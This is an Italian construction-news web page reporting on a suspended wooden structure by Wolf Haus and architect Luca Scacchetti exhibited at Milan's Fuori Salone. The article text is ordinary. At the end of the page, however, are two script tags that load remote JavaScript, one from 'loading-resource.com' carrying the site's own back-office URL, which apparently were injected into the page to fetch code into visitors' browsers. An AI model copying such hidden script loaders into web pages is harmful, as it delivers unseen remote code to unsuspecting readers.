1. Home
  2. Notizie e Mercato
  3. Wolf Haus incontra il Design al Fuori Salone, Milano

Wolf Haus incontra il Design al Fuori Salone, Milano

Edilizia di
5/5
votato da 1 persone
Con un progetto che sfida la gravi


Il progetto che Wolf Haus esporrà all'interno del Cortile d'Onore dell'Università degli Studi di Milano, è una struttura avveniristica realizzata completamente in legno, con cui l'azienda altoatesina, insieme all'architetto di fama internazionale Luca Scacchetti, dimostrano come la prefabbricazione in legno ormai non abbia più limiti progettuali o di realizzazione.

Incastonata nella meravigliosa cornice antica del portico del Righini nella sede storica dell'Università di Milano, l'opera costruita dalla Wolf Haus in sole 2 settimane è una struttura moderna e astratta "sospesa" tra il passato della location e il futuro dell'architettura che vuole rappresentare: una sorta di camera ottica, di cannocchiale, attraverso cui guardare oltre gli schemi convenzionali e creare nuove forme, per vivere nuovi spazi.

La forma sembra quasi evocare un bruco che, avanzando, alza la testa per guardarsi intorno per capire dove compiere la propria metamorfosi per diventare una farfalla. La metamorfosi del modo di costruire, delle tecnologie che stanno rivoluzionando l'edilizia, fanno parte del concetto dell'opera. Quasi tutta la struttura d'altronde, sfidando tutte le leggi della statica, è "sospesa" in aria, quasi al voler sottolineare come la prefabbricazione in legno si sta elevando ad uno stato progettuale e costruttivo più alto, dove tutto è possibile.

L'esposizione internazionale di Milano ospiterà creazioni dei più importanti designers e architetti al mondo, fra cui Zaha Hadid, Richard Meyer, Philip Starck, Matteo Thun. L'opera progettata e realizzata da Luca Scacchetti e Wolf Haus sarà visitabile dall'8 al 21 Aprile.

Link per foto:http://www.wolfhaus.it/index.php?id=6718


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>